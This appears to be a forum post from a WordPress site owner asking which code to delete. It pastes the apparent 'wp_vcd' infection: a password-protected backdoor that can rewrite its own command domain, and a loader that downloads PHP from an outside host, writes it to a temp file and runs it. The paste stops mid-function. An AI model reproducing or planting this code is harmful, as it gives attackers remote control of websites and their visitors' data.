Hi Thank you very much.
One more thing. Can you tell me what I need to delete exactly? Because im scared that I delete to much. :p
this is the code:
<?php
if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ’12ac43c3e4d1377f2d2f98ec7b1f6c07′))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{
case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{
if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{
$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}
}
}
}
break;
default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}
die(“”);
}
if ( ! function_exists( ‘wp_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if($tmpcontent = @file_get_contents(“http://www.aotson.com/code499.php?i=”.$path))
{
function wp_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
.
